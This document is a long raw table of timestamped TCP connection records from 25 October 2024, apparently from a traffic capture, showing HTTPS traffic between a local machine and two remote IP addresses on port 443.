                                              Oct 25, 2024 15:46:09.336338997 CEST4434985913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.336349010 CEST4434985913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.346812963 CEST49865443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:09.346916914 CEST4434986513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.347109079 CEST49865443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:09.347352028 CEST49865443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:09.347395897 CEST4434986513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.765094995 CEST44349860142.250.184.228192.168.2.4
                                              Oct 25, 2024 15:46:09.765549898 CEST49860443192.168.2.4142.250.184.228
                                              Oct 25, 2024 15:46:09.765567064 CEST44349860142.250.184.228192.168.2.4
                                              Oct 25, 2024 15:46:09.766047001 CEST44349860142.250.184.228192.168.2.4
                                              Oct 25, 2024 15:46:09.766601086 CEST49860443192.168.2.4142.250.184.228
                                              Oct 25, 2024 15:46:09.766685009 CEST44349860142.250.184.228192.168.2.4
                                              Oct 25, 2024 15:46:09.814083099 CEST49860443192.168.2.4142.250.184.228
                                              Oct 25, 2024 15:46:09.892338037 CEST4434986213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.893659115 CEST49862443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:09.893659115 CEST49862443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:09.893678904 CEST4434986213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.893683910 CEST4434986213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.897149086 CEST4434986113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.897675991 CEST49861443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:09.897706985 CEST4434986113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.898070097 CEST49861443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:09.898077011 CEST4434986113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.899795055 CEST4434986313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.900679111 CEST49863443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:09.900679111 CEST49863443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:09.900691986 CEST4434986313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.900711060 CEST4434986313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.988555908 CEST4434986413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.989304066 CEST49864443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:09.989336014 CEST4434986413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:09.990212917 CEST49864443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:09.990220070 CEST4434986413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.023176908 CEST4434986213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.023252964 CEST4434986213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.023458004 CEST49862443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.023583889 CEST49862443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.023583889 CEST49862443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.023601055 CEST4434986213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.023611069 CEST4434986213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.027430058 CEST49866443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.027446032 CEST4434986113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.027486086 CEST4434986613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.027507067 CEST4434986113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.027620077 CEST49866443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.027620077 CEST49861443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.027735949 CEST49861443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.027735949 CEST49861443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.027760029 CEST4434986113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.027777910 CEST4434986113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.029735088 CEST49866443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.029753923 CEST4434986613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.030647039 CEST49867443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.030697107 CEST4434986713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.030937910 CEST49867443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.031078100 CEST49867443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.031095028 CEST4434986713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.031461000 CEST4434986313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.031529903 CEST4434986313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.031754017 CEST49863443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.031810045 CEST49863443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.031810045 CEST49863443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.031816959 CEST4434986313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.031826019 CEST4434986313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.034540892 CEST49868443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.034624100 CEST4434986813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.035525084 CEST49868443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.035778999 CEST49868443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.035797119 CEST4434986813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.125745058 CEST4434986413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.125813961 CEST4434986413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.125900030 CEST49864443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.125926018 CEST4434986413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.126032114 CEST49864443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.126101971 CEST49864443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.126116991 CEST4434986413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.126148939 CEST49864443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.126154900 CEST4434986413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.128984928 CEST49869443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.129015923 CEST4434986913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.129255056 CEST49869443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.129255056 CEST49869443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.129295111 CEST4434986913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.508898020 CEST4434986513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.509663105 CEST49865443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.509699106 CEST4434986513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.510411978 CEST49865443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.510417938 CEST4434986513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.639133930 CEST4434986513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.639281988 CEST4434986513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.639358044 CEST49865443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.639564037 CEST49865443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.639585972 CEST4434986513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.639625072 CEST49865443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.639631033 CEST4434986513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.643626928 CEST49870443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.643687963 CEST4434987013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.643784046 CEST49870443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.643950939 CEST49870443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.643980026 CEST4434987013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.753513098 CEST4434986713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.754096985 CEST49867443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.754154921 CEST4434986713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.754585028 CEST49867443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.754599094 CEST4434986713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.760847092 CEST4434986613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.761254072 CEST49866443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.761285067 CEST4434986613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.761761904 CEST49866443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.761770010 CEST4434986613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.782702923 CEST4434986813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.783149004 CEST49868443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.783193111 CEST4434986813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.783596992 CEST49868443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.783610106 CEST4434986813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.862308979 CEST4434986913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.862741947 CEST49869443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.862788916 CEST4434986913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.863185883 CEST49869443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.863193989 CEST4434986913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.882663012 CEST4434986713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.882817984 CEST4434986713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.882895947 CEST49867443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.883014917 CEST49867443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.883054018 CEST4434986713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.883080006 CEST49867443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.883095980 CEST4434986713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.886142969 CEST49871443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.886171103 CEST4434987113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.886245966 CEST49871443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.886465073 CEST49871443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.886476040 CEST4434987113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.890891075 CEST4434986613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.891082048 CEST4434986613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.891117096 CEST4434986613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.891127110 CEST49866443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.891171932 CEST49866443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.891246080 CEST49866443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.891264915 CEST4434986613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.891277075 CEST49866443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.891283989 CEST4434986613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.893572092 CEST49872443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.893615961 CEST4434987213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.893779993 CEST49872443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.893935919 CEST49872443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.893961906 CEST4434987213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.917190075 CEST4434986813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.917258024 CEST4434986813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.917327881 CEST49868443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.917443037 CEST49868443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.917474031 CEST4434986813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.917529106 CEST49868443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.917543888 CEST4434986813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.919476032 CEST49873443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.919497013 CEST4434987313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.919667006 CEST49873443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.919774055 CEST49873443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.919789076 CEST4434987313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.990653992 CEST4434986913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.990814924 CEST4434986913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.990885019 CEST49869443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.990957022 CEST49869443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.990971088 CEST4434986913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.990979910 CEST49869443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.990984917 CEST4434986913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.993540049 CEST49874443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.993607044 CEST4434987413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:10.993834019 CEST49874443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.993834972 CEST49874443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:10.993896961 CEST4434987413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.390482903 CEST4434987013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.391659975 CEST49870443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.391659975 CEST49870443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.391671896 CEST4434987013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.391681910 CEST4434987013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.523533106 CEST4434987013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.523603916 CEST4434987013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.523715973 CEST4434987013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.523854971 CEST49870443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.523989916 CEST49870443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.523989916 CEST49870443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.524019957 CEST4434987013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.524030924 CEST4434987013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.527261972 CEST49875443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.527309895 CEST4434987513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.527627945 CEST49875443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.527627945 CEST49875443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.527669907 CEST4434987513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.626724005 CEST4434987113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.627913952 CEST49871443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.627913952 CEST49871443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.627969980 CEST4434987113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.628024101 CEST4434987113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.628854036 CEST4434987213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.629761934 CEST49872443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.629762888 CEST49872443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.629805088 CEST4434987213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.629827023 CEST4434987213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.660737038 CEST4434987313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.661662102 CEST49873443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.661662102 CEST49873443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.661685944 CEST4434987313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.661705971 CEST4434987313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.747977972 CEST4434987413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.749088049 CEST49874443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.749088049 CEST49874443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.749129057 CEST4434987413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.749156952 CEST4434987413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.757565022 CEST4434987213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.757725000 CEST4434987213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.758007050 CEST49872443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.758039951 CEST49872443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.758039951 CEST49872443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.758059025 CEST4434987213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.758069992 CEST4434987213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.758291960 CEST4434987113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.758368969 CEST4434987113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.758790016 CEST49871443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.758790016 CEST49871443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.758790016 CEST49871443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.761378050 CEST49876443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.761379957 CEST49877443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.761405945 CEST4434987713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.761425972 CEST4434987613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.761502981 CEST49876443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.761503935 CEST49877443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.761640072 CEST49877443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.761648893 CEST4434987713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.761682034 CEST49876443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.761694908 CEST4434987613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.798038006 CEST4434987313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.798168898 CEST4434987313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.798356056 CEST49873443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.798356056 CEST49873443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.798535109 CEST49873443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.798551083 CEST4434987313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.801338911 CEST49878443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.801377058 CEST4434987813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.801641941 CEST49878443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.801641941 CEST49878443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.801693916 CEST4434987813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.876744986 CEST4434987413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.877335072 CEST4434987413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.877439976 CEST4434987413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.877671003 CEST49874443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.877671003 CEST49874443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.877671003 CEST49874443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.879937887 CEST49879443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.879955053 CEST4434987913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:11.880321026 CEST49879443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.880321026 CEST49879443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:11.880346060 CEST4434987913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:12.064162970 CEST49871443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:12.064230919 CEST4434987113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:12.189085960 CEST49874443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:12.189152956 CEST4434987413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.263763905 CEST4434987513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.264849901 CEST49875443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.264849901 CEST49875443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.264894962 CEST4434987513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.264919043 CEST4434987513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.604959011 CEST4434987813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.605246067 CEST4434987513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.605338097 CEST4434987513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.605499983 CEST49875443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.605509043 CEST49878443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.605571985 CEST4434987813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.605859995 CEST49875443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.605892897 CEST4434987513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.605926991 CEST49875443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.605938911 CEST4434987513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.606192112 CEST49878443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.606225967 CEST4434987813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.607389927 CEST4434987713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.607805967 CEST49877443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.607817888 CEST4434987713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.609059095 CEST49877443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.609061956 CEST49880443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.609064102 CEST4434987713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.609097958 CEST4434988013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.609302044 CEST49880443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.609321117 CEST4434987613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.609360933 CEST49880443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.609370947 CEST4434988013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.609695911 CEST49876443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.609713078 CEST4434987613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.610142946 CEST49876443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.610155106 CEST4434987613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.622487068 CEST4434987913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.623261929 CEST49879443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.623261929 CEST49879443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.623275995 CEST4434987913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.623291969 CEST4434987913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.734925032 CEST4434987813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.734997988 CEST4434987813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.735277891 CEST49878443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.735279083 CEST49878443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.735407114 CEST49878443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.735443115 CEST4434987813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.738356113 CEST49881443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.738399029 CEST4434988113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.738672018 CEST49881443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.738672018 CEST49881443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.738708973 CEST4434988113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.738737106 CEST4434987713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.738884926 CEST4434987713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.739104033 CEST49877443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.739104033 CEST49877443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.739253044 CEST49877443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.739267111 CEST4434987713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.741120100 CEST49882443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.741144896 CEST4434988213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.741401911 CEST49882443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.741401911 CEST49882443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.741427898 CEST4434988213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.743643999 CEST4434987613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.743786097 CEST4434987613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.743832111 CEST4434987613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.744019985 CEST49876443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.744019985 CEST49876443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.744240999 CEST49876443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.744255066 CEST4434987613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.745918989 CEST49883443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.745933056 CEST4434988313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.746018887 CEST49883443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.746136904 CEST49883443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.746151924 CEST4434988313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.753320932 CEST4434987913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.753393888 CEST4434987913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.753668070 CEST49879443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.753668070 CEST49879443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.754014015 CEST49879443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.754019022 CEST4434987913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.755523920 CEST49884443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.755569935 CEST4434988413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:13.755736113 CEST49884443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.755840063 CEST49884443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:13.755856991 CEST4434988413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:14.342781067 CEST4434988013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:14.343436956 CEST49880443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:14.343453884 CEST4434988013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:14.343957901 CEST49880443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:14.343964100 CEST4434988013.107.246.45192.168.2.4
